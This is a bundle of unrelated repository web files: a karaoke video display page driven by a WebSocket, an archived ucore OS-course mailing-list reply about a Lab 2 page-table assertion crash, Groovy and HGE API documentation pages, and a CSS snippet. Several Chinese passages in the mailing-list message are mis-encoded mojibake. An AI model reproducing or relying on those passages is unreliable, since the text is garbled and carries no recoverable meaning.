<!DOCTYPE html> <html> <head> <!-- Standard Meta --> <meta charset="utf-8" /> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0"> <!-- Site Properities --> <title>为爱欢呼</title> <script src="/static/js/jquery.min.js"></script> <script src="/static/js/semantic.min.js"></script> <script src="/static/js/jquery.ajaxcsrf.js"></script> <link rel="stylesheet" type="text/css" href="/static/css/semantic.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/site.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/container.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/grid.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/header.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/image.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/menu.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/divider.css"> <!-- <link rel="stylesheet" type="text/css" href="/static/js/components/segment.css">--> <link rel="stylesheet" type="text/css" href="/static/js/components/form.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/input.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/button.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/list.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/message.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/icon.css"> <link rel="stylesheet" type="text/css" href="/static/js/components/tab.css"> <link rel="stylesheet" type="text/css" href="/static/css/docs.css"> <link rel="stylesheet" type="text/css" href="/static/css/video-js.css"> <script src="/static/js/jquery-ui-1.10.1.custom.min.js"></script> <script src="/static/js/components/tab.min.js"></script> <script src="/static/js/video.js"></script> <style type="text/css"> .lyric { position:absolute; margin-top:3%; z-index:100; color:white; font-size: xx-large; font-weight: bold; width:100%; } .mv { position:absolute; z-index:50; } </style> </head> <body style="background:black"> <div style="text-align:center;width:100%;background:black" id="mv_show"> <div id="display_lyric" class="lyric"></div> <video id="mv_video" class="video-js vjs-default-skin mv"></video> </div> <div id="standby_img"> <img src="/static/image/standby_img.jpg"></img> </div> <script type="text/javascript"> $("#mv_show").hide(); $("#standby_img").show(); var chat_socket = new WebSocket('ws://{{ IP }}:10030/chat'); register(chat_socket); mv_player=null; if (chat_socket) { chat_socket.onmessage = function(event) { if (JSON.parse(event.data)["type"] == "lyric") { lyric_content = JSON.parse(event.data)['message']; $("#display_lyric").text(lyric_content); } else if (JSON.parse(event.data)["type"] == "mv") { $("#display_lyric").empty(); mv_path = JSON.parse(event.data)['message']; $("#mv_video").empty(); $("#mv_video").append('<source src="/media/mv_templates/' + mv_path + '" type="video/mp4"/>'); mv_player = videojs("mv_video", {"autoplay": false, "preload": "auto", "loop": "true", "width": "1280px", "height": "720px", }); $("#mv_show").show(); $("#standby_img").hide(); mv_player.requestFullscreen(); mv_player.play(); } else if (JSON.parse(event.data)["type"] == "ctrl") { ctrl_content = JSON.parse(event.data)['message']; if (ctrl_content == "standby") { $("#mv_show").hide(); $("#standby_img").show(); mv_player.dispose(); $("#mv_show").append('<video id="mv_video" class="video-js vjs-default-skin mv"></video>'); } } } } function register(chat_socket) { var msg = "register#@#show" sendMessage(chat_socket, msg); } function sendMessage(chat_socket, msg) { waitForSocketConnection(chat_socket, function() { chat_socket.send(msg); }); }; function waitForSocketConnection(socket, callback) { setTimeout( function(){ if (socket.readyState === 1) { if(callback !== undefined){ callback(); } return; } else { waitForSocketConnection(socket,callback); } }, 5); }; </script> </body> </html>
output/0496.html
Dominic--/CCPT
<?xml version="1.0" encoding="GB2312"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en"> <head> <meta http-equiv="Content-Type" content="text/html; charset=GB2312" /> <meta name="generator" content="hypermail 2.3.0, see http://www.hypermail-project.org/" /> <title>Re: [Lab 2] Question on running check_boot_pgdir from Yu Chen on 2012-09-15 (gmail.mbox)</title> <meta name="Author" content="Yu Chen (chyyuu_at_gmail.com)" /> <meta name="Subject" content="Re: [Lab 2] Question on running check_boot_pgdir" /> <meta name="Date" content="2012-09-15" /> <style type="text/css"> /*<![CDATA[*/ /* To be incorporated in the main stylesheet, don't code it in hypermail! */ body {color: black; background: #ffffff} dfn {font-weight: bold;} pre { background-color:inherit;} .head { border-bottom:1px solid black;} .foot { border-top:1px solid black;} th {font-style:italic;} table { margin-left:2em;}map ul {list-style:none;} #mid { font-size:0.9em;} #received { float:right;} address { font-style:inherit ;} /*]]>*/ .quotelev1 {color : #990099} .quotelev2 {color : #ff7700} .quotelev3 {color : #007799} .quotelev4 {color : #95c500} .period {font-weight: bold} </style> </head> <body> <div class="head"> <h1>Re: [Lab 2] Question on running check_boot_pgdir</h1> <!-- received="Wed May 15 21:25:46 2013" --> <!-- isoreceived="20130515172546" --> <!-- sent="Sat, 15 Sep 2012 21:16:18 +0800" --> <!-- isosent="20120915131618" --> <!-- name="Yu Chen" --> <!-- email="chyyuu_at_gmail.com" --> <!-- subject="Re: [Lab 2] Question on running check_boot_pgdir" --> <!-- id="CAAdffVEErLTpYn4HKm83V1NkuZsr5xCUFckYc8C4=TgTtBX6AA_at_mail.gmail.com" --> <!-- charset="GB2312" --> <!-- inreplyto="CAH5fjeMLYVm+h8W8bkHN6aCAb+szRF4Z0=NN5G=vdsV1Mkxv_A_at_mail.gmail.com" --> <!-- expires="-1" --> <map id="navbar" name="navbar"> <ul class="links"> <li> <dfn>This message</dfn>: [ <a href="#start496" name="options1" id="options1" tabindex="1">Message body</a> ] [ More options (<a href="#options2">top</a>, <a href="#options3">bottom</a>) ] </li> <li> <dfn>Related messages</dfn>: <!-- unext="start" --> [ <a href="0497.html" accesskey="d" title="chyyuu: &quot;[chyyuu/ucore_pub] 790062: Update README&quot;">Next message</a> ] [ <a href="0495.html" title="Object Ho: &quot;Re: [Lab 2] Question on running check_boot_pgdir&quot;">Previous message</a> ] [ <a href="0495.html" title="Object Ho: &quot;Re: [Lab 2] Question on running check_boot_pgdir&quot;">In reply to</a> ] <!-- unextthread="start" --> <!-- ureply="end" --> </li> </ul> </map> <ul class="links"> <li><a name="options2" id="options2"></a><dfn>Contemporary messages sorted</dfn>: [ <a href="date.html#msg496" title="Contemporary messages by date">by date</a> ] [ <a href="index.html#msg496" title="Contemporary discussion threads">by thread</a> ] [ <a href="subject.html#msg496" title="Contemporary messages by subject">by subject</a> ] [ <a href="author.html#msg496" title="Contemporary messages by author">by author</a> ] [ <a href="attachment.html" title="Contemporary messages by attachment">by messages with attachments</a> ]</li> </ul> </div> <!-- body="start" --> <div class="mail"> <address class="headers"> <span id="from"> <dfn>From</dfn>: Yu Chen &lt;<a href="mailto:chyyuu_at_gmail.com?Subject=Re%3A%20%5BLab%202%5D%20Question%20on%20running%20check_boot_pgdir">chyyuu_at_gmail.com</a>&gt; </span><br /> <span id="date"><dfn>Date</dfn>: Sat, 15 Sep 2012 21:16:18 +0800</span><br /> </address> <br /> Congratulation! <br /> Ã÷ÌìÓпÕÂð£¿ÎÒÏëÓëÄã̸̸lab1/2µÄÇé¿ö£¬Á˽âÄãµÄÕÆÎÕÇé¿ö¡£ÁíÍ⣬ÇëÏêϸ¼Ç¼һÏÂÄãÔÚlab1£¬lab2ÖÐÅöµ½µÄÎÊÌ⣬ÈçºÎ½â¾öµÄ£¬lab2¸÷¸ö²¿·Ö»¨·ÑµÄʱ¼ä£¬Äã¶Ô¸÷¸ö²¿·ÖÄѶȵĹÀ¼ÆµÈ£¬È»ºó·¢¸øÎҺͿ¡½Ü¡£ <br /> ½ÓÏÂÀ´£¬Ä㻹Ҫ½øÈëÓë³ÂÓîºãÒ»Æð¿ªÕ¹ucore with linux device driverµÄÑо¿¹¤×÷¡£ <br /> ÓÐÄѶȺÍѹÁ¦£¬Ï£ÍûÄܹ»Í¦×¡£¡ <br /> <br />2012/9/15 Object Ho &lt;objectkuan_at_gmail.com&gt;: <br /> <em class="quotelev1">&gt; yes, it is the same... </em><br /> <em class="quotelev1">&gt; ok. lab 2 passed </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; Doc 2 has two sentences: </em><br /> <em class="quotelev1">&gt; Ò³±íµÄ¿Õ¼ä´óСȡ¾öÓëÒ³±íÒª¹ÜÀíµÄÎïÊý n£¬Ò»¸öÒ³±íÏ 32룬¼´ 4×Ö½Ú£©¿É¹ÜÀíÒ»¸öÎïÒ³£¬Ò³±íÐèÒªÕ¼ </em><br /> <em class="quotelev1">&gt; n/256¸öÎïÀíÒ³¿Õ¼ä¡£ÕâÑùĿ¼±íºÍËùÕ¼µÄ×Ü´óСΪ 4096+1024*n×Ö½Ú¡£ </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; I'm not sure whether I understand this in a wrong way. </em><br /> <em class="quotelev1">&gt; I feel it's easier for me to understand it with this order: </em><br /> <em class="quotelev1">&gt; Ò³±íµÄ¿Õ¼ä´óСȡ¾öÓëÒ³±íÒª¹ÜÀíµÄÎïÊý n£¬Ò»¸öÒ³±íÏ 32룬¼´ 4×Ö½Ú£©¿É¹ÜÀíÒ»¸öÎïÒ³£¬Ä¿Â¼±íºÍËùÕ¼µÄ×Ü´óСΪ </em><br /> <em class="quotelev1">&gt; 4096+1024*n×Ö½Ú¡£ÕâÑùÒ³±íÐèÒªÕ¼ n/256¸öÎïÀíÒ³¿Õ¼ä¡£ </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; 2012/9/15 é¿¡½Ü &lt;eternal.n08_at_gmail.com&gt; </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; ÔÚ 15 Sep 2012£¬13:40£¬Object Ho &lt;objectkuan_at_gmail.com&gt; дµÀ£º </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; After passing check_alloc_page() and check_pgdir() </em><br /> <em class="quotelev2">&gt;&gt; my code crashes in check_boot_pgdir() and cannot pass </em><br /> <em class="quotelev2">&gt;&gt; in assert(page_insert(boot_pgdir, p, 0x100, PTE_W) == 0); </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; the os reboots repeatly once it reaches this assertion. </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; I trace the code and find the problem appears in the function memset in </em><br /> <em class="quotelev2">&gt;&gt; get_pte() </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; memset(pa, 0, PGSIZE); </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; Maybe Same with the issue you have yesterday? </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; here pa=0x3dc000 </em><br /> <em class="quotelev2">&gt;&gt; and PGSIZE=0x1000 </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; what might be the cause of this error? </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; -- </em><br /> <em class="quotelev2">&gt;&gt; All lab's codes and docs are in <a href="https://github.com/chyyuu/ucore_pub">https://github.com/chyyuu/ucore_pub</a> </em><br /> <em class="quotelev2">&gt;&gt; --- </em><br /> <em class="quotelev2">&gt;&gt; You received this message because you are subscribed to the Google Groups </em><br /> <em class="quotelev2">&gt;&gt; &quot;os-course&quot; group. </em><br /> <em class="quotelev2">&gt;&gt; To post to this group, send email to oscourse_at_googlegroups.com. </em><br /> <em class="quotelev2">&gt;&gt; To unsubscribe from this group, send email to </em><br /> <em class="quotelev2">&gt;&gt; oscourse+unsubscribe_at_googlegroups.com. </em><br /> <em class="quotelev2">&gt;&gt; Visit this group at <a href="http://groups.google.com/group/oscourse?hl=en-US">http://groups.google.com/group/oscourse?hl=en-US</a>. </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; -- </em><br /> <em class="quotelev2">&gt;&gt; All lab's codes and docs are in <a href="https://github.com/chyyuu/ucore_pub">https://github.com/chyyuu/ucore_pub</a> </em><br /> <em class="quotelev2">&gt;&gt; --- </em><br /> <em class="quotelev2">&gt;&gt; You received this message because you are subscribed to the Google Groups </em><br /> <em class="quotelev2">&gt;&gt; &quot;os-course&quot; group. </em><br /> <em class="quotelev2">&gt;&gt; To post to this group, send email to oscourse_at_googlegroups.com. </em><br /> <em class="quotelev2">&gt;&gt; To unsubscribe from this group, send email to </em><br /> <em class="quotelev2">&gt;&gt; oscourse+unsubscribe_at_googlegroups.com. </em><br /> <em class="quotelev2">&gt;&gt; Visit this group at <a href="http://groups.google.com/group/oscourse?hl=en-US">http://groups.google.com/group/oscourse?hl=en-US</a>. </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev2">&gt;&gt; </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; -- </em><br /> <em class="quotelev1">&gt; All lab's codes and docs are in <a href="https://github.com/chyyuu/ucore_pub">https://github.com/chyyuu/ucore_pub</a> </em><br /> <em class="quotelev1">&gt; --- </em><br /> <em class="quotelev1">&gt; You received this message because you are subscribed to the Google Groups </em><br /> <em class="quotelev1">&gt; &quot;os-course&quot; group. </em><br /> <em class="quotelev1">&gt; To post to this group, send email to oscourse_at_googlegroups.com. </em><br /> <em class="quotelev1">&gt; To unsubscribe from this group, send email to </em><br /> <em class="quotelev1">&gt; oscourse+unsubscribe_at_googlegroups.com. </em><br /> <em class="quotelev1">&gt; Visit this group at <a href="http://groups.google.com/group/oscourse?hl=en-US">http://groups.google.com/group/oscourse?hl=en-US</a>. </em><br /> <em class="quotelev1">&gt; </em><br /> <em class="quotelev1">&gt; </em><br /> <br /><br /><br /><pre> -- Best Regards ============================================== Yu Chen Ph.D. Associate Professor System Software&amp;Software Engineering Group, Laboratory of Pervasive Computing, Dept. of Computer Science and Technology Tsinghua University, Beijing 100084, P.R. China E-Mail: mailto:yuchen_at_tsinghua.edu.cn chyyuu_at_gmail&#46;<!--nospam-->com ============================================== -- All lab's codes and docs are in <a href="https://github.com/chyyuu/ucore_pub">https://github.com/chyyuu/ucore_pub</a> --- You received this message because you are subscribed to the Google Groups &quot;os-course&quot; group. To post to this group, send email to oscourse_at_googlegroups.com. To unsubscribe from this group, send email to oscourse+unsubscribe_at_googlegroups.com. Visit this group at <a href="http://groups.google.com/group/oscourse?hl=en-US">http://groups.google.com/group/oscourse?hl=en-US</a>. </pre> <span id="received"><dfn>Received on</dfn> Wed May 15 2013 - 21:25:46 MSD</span> </div> <!-- body="end" --> <div class="foot"> <map id="navbarfoot" name="navbarfoot" title="Related messages"> <ul class="links"> <li><dfn>This message</dfn>: [ <a href="#start496">Message body</a> ]</li> <!-- lnext="start" --> <li><dfn>Next message</dfn>: <a href="0497.html" title="Next message in the list">chyyuu: "[chyyuu/ucore_pub] 790062: Update README"</a></li> <li><dfn>Previous message</dfn>: <a href="0495.html" title="Previous message in the list">Object Ho: "Re: [Lab 2] Question on running check_boot_pgdir"</a></li> <li><dfn>In reply to</dfn>: <a href="0495.html" title="Message to which this message replies">Object Ho: "Re: [Lab 2] Question on running check_boot_pgdir"</a></li> <!-- lnextthread="start" --> <!-- lreply="end" --> </ul> <ul class="links"> <li><a name="options3" id="options3"></a><dfn>Contemporary messages sorted</dfn>: [ <a href="date.html#msg496" title="Contemporary messages by date">by date</a> ] [ <a href="index.html#msg496" title="Contemporary discussion threads">by thread</a> ] [ <a href="subject.html#msg496" title="Contemporary messages by subject">by subject</a> ] [ <a href="author.html#msg496" title="Contemporary messages by author">by author</a> ] [ <a href="attachment.html" title="Contemporary messages by attachment">by messages with attachments</a> ]</li> </ul> </map> </div> <!-- trailer="footer" --> <p><small><em> This archive was generated by <a href="http://www.hypermail-project.org/">hypermail 2.3.0</a> : Wed May 15 2013 - 21:28:52 MSD </em></small></p> </body> </html>
docs/UnaCloudWeb/gapi/webutils/UserSession.html
UnaCloud/UnaCloud2
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <!-- **************************************************************** --> <!-- * PLEASE KEEP COMPLICATED EXPRESSIONS OUT OF THESE TEMPLATES, * --> <!-- * i.e. only iterate & print data where possible. Thanks, Jez. * --> <!-- **************************************************************** --> <html> <head> <!-- Generated by groovydoc (2.3.6) on Thu Jun 02 15:28:14 COT 2016 --> <title>UserSession (Groovy Documentation)</title> <meta name="date" content="2016-06-02"> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <link href="../groovy.ico" type="image/x-icon" rel="shortcut icon"> <link href="../groovy.ico" type="image/x-icon" rel="icon"> <link rel="stylesheet" type="text/css" href="../stylesheet.css" title="Style"> <body class="center"> <script type="text/javascript"><!-- if (location.href.indexOf('is-external=true') == -1) { parent.document.title="UserSession (Groovy Documentation)"; } //--> </script> <noscript> <div>JavaScript is disabled on your browser.</div> </noscript> <!-- ========= START OF TOP NAVBAR ======= --> <div class="topNav"><a name="navbar_top"> <!-- --> </a><a href="#skip-navbar_top" title="Skip navigation links"></a><a name="navbar_top_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-all.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <div> <ul class="navList"> <li><a href="../index.html?webutils/UserSession" target="_top">Frames</a></li> <li><a href="UserSession.html" target="_top">No Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;<li><a href="#property_summary">Property</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#constructor_summary">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_summary">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;<li><a href="#prop_detail">Property</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#constructor_detail">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_detail">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> </div> <a name="skip-navbar_top"> <!-- --> </a></div> <!-- ========= END OF TOP NAVBAR ========= --> <!-- ======== START OF CLASS DATA ======== --> <div class="header"> <div class="subTitle">Package: <strong>webutils</strong></div> <h2 title="[Groovy] Class UserSession" class="title">[Groovy] Class UserSession</h2> </div> <div class="contentContainer"> <ul class="inheritance"> <li><ul class="inheritance"></ul></li><li>webutils.UserSession </ul> <div class="description"> <ul class="blockList"> <li class="blockList"> <p> Class that represent a user instance to be saved in session. This class has the purpose to avoid duplicated instance and exception <DL><DT><B>Authors:</B></DT><DD>CesarF</DD></DL></p> </li> </ul> </div> <div class="summary"> <ul class="blockList"> <li class="blockList"> <!-- =========== NESTED CLASS SUMMARY =========== --> <!-- =========== ENUM CONSTANT SUMMARY =========== --> <!-- =========== FIELD SUMMARY =========== --> <!-- =========== PROPERTY SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="property_summary"><!-- --></a> <h3>Properties Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Properties Summary table, listing nested classes, and an explanation"> <caption><span>Properties</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Type</th> <th class="colLast" scope="col">Name and description</th> </tr> <tr class="altColor"> <td class="colFirst"><code><strong>java.lang.String</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#description"></a>description</code><br></td> </tr> <tr class="rowColor"> <td class="colFirst"><code><strong>long</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#id"></a>id</code><br></td> </tr> <tr class="altColor"> <td class="colFirst"><code><strong>boolean</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#isAdmin"></a>isAdmin</code><br></td> </tr> <tr class="rowColor"> <td class="colFirst"><code><strong>java.lang.String</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#name"></a>name</code><br></td> </tr> <tr class="altColor"> <td class="colFirst"><code><strong>java.lang.String</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#registerDate"></a>registerDate</code><br></td> </tr> <tr class="rowColor"> <td class="colFirst"><code><strong>java.lang.String</strong></code>&nbsp;</td> <td class="colLast"><code><a href="#username"></a>username</code><br></td> </tr> </table> </ul> </li> </ul> <!-- =========== ELEMENT SUMMARY =========== --> <!-- ======== CONSTRUCTOR SUMMARY ======== --> <ul class="blockList"> <li class="blockList"><a name="constructor_summary"><!-- --></a> <h3>Constructor Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Constructors Summary table"> <caption><span>Constructors</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Constructor and description</th> </tr> <tr class="altColor"> <td class="colFirst"> <code><a href="#UserSession(long, java.lang.String, java.lang.String, java.lang.String, java.lang.String, boolean)">UserSession</a></strong> (long id, java.lang.String name, java.lang.String username, java.lang.String description, java.lang.String registerDate, boolean admin)</code><br></td> </tr> </table> </ul> </li> </ul> <!-- ========== METHOD SUMMARY =========== --> <ul class="blockList"> <li class="blockList"><a name="method_summary"><!-- --></a> <h3>Methods Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Methods Summary table"> <caption><span>Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Type</th> <th class="colLast" scope="col">Name and description</th> </tr> <tr class="altColor"> <td class="colFirst"><code>boolean</strong></code></td> <td class="colLast"><code><strong><a href="#isAdmin()">isAdmin</a></strong>()</code><br>Validates in user group service if user in session is admin @return</td> </tr> <tr class="rowColor"> <td class="colFirst"><code>void</strong></code></td> <td class="colLast"><code><strong><a href="#refresh(unacloud.User)">refresh</a></strong>(<a href='../unacloud/User.html'>User</a> user)</code><br>Update this entity based in a user entity sent by parameters</td> </tr> </table> </ul> </li> <li class="blockList"><a name="method_summary"><!-- --></a> <h3>Inherited Methods Summary</h3> <ul class="blockList"> <table class="overviewSummary" border="0" cellpadding="3" cellspacing="0" summary="Inherited Methods Summary table"> <caption><span>Inherited Methods</span><span class="tabEnd">&nbsp;</span></caption> <tr> <th class="colFirst" scope="col">Methods inherited from class</th> <th class="colLast" scope="col">Name</th> </tr> <tr class="altColor"> <td class="colFirst"><code>class java.lang.Object</strong></code></td> <td class="colLast"><code>java.lang.Object#wait(long, int), java.lang.Object#wait(long), java.lang.Object#wait(), java.lang.Object#equals(java.lang.Object), java.lang.Object#toString(), java.lang.Object#hashCode(), java.lang.Object#getClass(), java.lang.Object#notify(), java.lang.Object#notifyAll()</code></td> </tr> </table> </ul> </li> </ul> </li> </ul> </div> <div class="details"> <ul class="blockList"> <li class="blockList"> <!-- =========== PROPERTY DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="prop_detail"> <!-- --> </a> <h3>Property Detail</h3> <a name="description"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>java.lang.String <strong>description</strong></h4> <p></p> </li> </ul> <a name="id"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>long <strong>id</strong></h4> <p></p> </li> </ul> <a name="isAdmin"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>boolean <strong>isAdmin</strong></h4> <p></p> </li> </ul> <a name="name"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>java.lang.String <strong>name</strong></h4> <p></p> </li> </ul> <a name="registerDate"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>java.lang.String <strong>registerDate</strong></h4> <p></p> </li> </ul> <a name="username"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>java.lang.String <strong>username</strong></h4> <p></p> </li> </ul> </li> </ul> <!-- =========== CONSTRUCTOR DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="constructor_detail"> <!-- --> </a> <h3>Constructor Detail</h3> <a name="UserSession(long, java.lang.String, java.lang.String, java.lang.String, java.lang.String, boolean)"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4><strong>UserSession</strong>(long id, java.lang.String name, java.lang.String username, java.lang.String description, java.lang.String registerDate, boolean admin)</h4> <p></p> </li> </ul> </li> </ul> <!-- =========== METHOD DETAIL =========== --> <ul class="blockList"> <li class="blockList"><a name="method_detail"> <!-- --> </a> <h3>Method Detail</h3> <a name="isAdmin()"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>boolean <strong>isAdmin</strong>()</h4> <p> Validates in user group service if user in session is admin <DL><DT><B>Returns:</B></DT><DD></DD></DL></p> </li> </ul> <a name="refresh(unacloud.User)"><!-- --></a> <ul class="blockListLast"> <li class="blockList"> <h4>void <strong>refresh</strong>(<a href='../unacloud/User.html'>User</a> user)</h4> <p> Update this entity based in a user entity sent by parameters <DL><DT><B>Parameters:</B></DT><DD>user</DD></DL></p> </li> </ul> </li> </ul> </li> </ul> </div> <!-- ========= END OF CLASS DATA ========= --> <!-- ======= START OF BOTTOM NAVBAR ====== --> <div class="bottomNav"><a name="navbar_bottom"> <!-- --> </a><a href="#skip-navbar_bottom" title="Skip navigation links"></a><a name="navbar_bottom_firstrow"> <!-- --> </a> <ul class="navList" title="Navigation"> <li><a href="../overview-summary.html">Overview</a></li> <li><a href="package-summary.html">Package</a></li> <li class="navBarCell1Rev">Class</li> <li><a href="../deprecated-list.html">Deprecated</a></li> <li><a href="../index-all.html">Index</a></li> <li><a href="../help-doc.html">Help</a></li> </ul> </div> <div class="subNav"> <div> <ul class="navList"> <li><a href="../index.html?webutils/UserSession" target="_top">Frames</a></li> <li><a href="UserSession.html" target="_top">No Frames</a></li> </ul> </div> <div> <ul class="subNavList"> <li>Summary:&nbsp;</li> Nested&nbsp;&nbsp;&nbsp;Field&nbsp;&nbsp;&nbsp;<li><a href="#property_summary">Property</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#constructor_summary">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_summary">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> <ul class="subNavList"> <li>&nbsp;|&nbsp;Detail:&nbsp;</li> Field&nbsp;&nbsp;&nbsp;<li><a href="#prop_detail">Property</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#constructor_detail">Constructor</a></li>&nbsp;&nbsp;&nbsp;<li><a href="#method_detail">Method</a></li>&nbsp;&nbsp;&nbsp; </ul> </div> <p>Groovy Documentation</p> <a name="skip-navbar_bottom"> <!-- --> </a> </div> </div> <!-- ======== END OF BOTTOM NAVBAR ======= --> </body> </html>
doc/html/hgegui_update.html
cheeseEater/ihge
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN"> <!-- http://hge.relishgames.com --> <html> <head> <meta name="Keywords" content="game engine, 2d, hardware accelerated, hge, engine, relish games, game development"> <meta name="Description" content="Haaf's Game Engine - Hardware accelerated 2D games engine"> <title>Haaf's Game Engine - Hardware accelerated 2D games engine</title> <link rel=stylesheet type=text/css href=hge.css> <script language="JavaScript" src="hge.js"></script> </head> <body onload="setContents('cnt_hgegui.html');" bgcolor=#ffffff text=#000000 link=#7F0000 vlink=#7F0000 alink=#7F0000 marginwidth=0 marginheight=0 leftmargin=0 topmargin=0> <table height=100% cellspacing=0 cellpadding=0 border=0><tr> <td valign=top> <table width=566 cellspacing=0 cellpadding=20 border=0><tr><td> <h1 style="margin-top:0px">hgeGUI::Update</h1> <p> Updates the GUI controls and processes user input. </p> <pre> int Update( float <i><b>fDeltaTime</b></i> ); </pre> <h2>Parameters</h2> <dl> <dt><i>fDeltaTime</i> <dd>Amount of time elapsed since last call to the <b>Update</b> method in seconds. </dl> <h2>Return value</h2> <p> If one of the controls has changed it's state, <b>Update</b> returns that control's identificator. If <a href="hgegui_leave.html">Leave</a> method was called and all the controls have finished their animation, <b>Update</b> returns -1. Otherwise it returns 0. </p> <h2>Remarks</h2> <p> Call the <b>Update</b> method in your frame function to update the GUI. The amount of time elapsed since last call to frame function may be obtained with <a href="hgefunc_timergetdelta.html">Timer_GetDelta</a> system layer function. </p> <h2>Requirements</h2> <p> <b>Header:</b> hgegui.h<br> <b>Import library:</b> hgehelp.lib<br> </p> <br> </td></tr></table> </td> </tr></table> </body> </html>
templates/mobile_pda/resources/styles/tweaks/operamini.css
miohtama/mobilejoomla
/* for Opera Mini 4 */ /*creates 3 x 3 (portrait) grid on 240 px wide devices*/ ul.grid li img { border: 1px solid #BEC1C3; padding: .1em .1em; margin-right: .1em; margin-bottom: .2em; }
datasets/java/election/docs/corgis/election/package-summary.html
RealTimeWeb/datasets
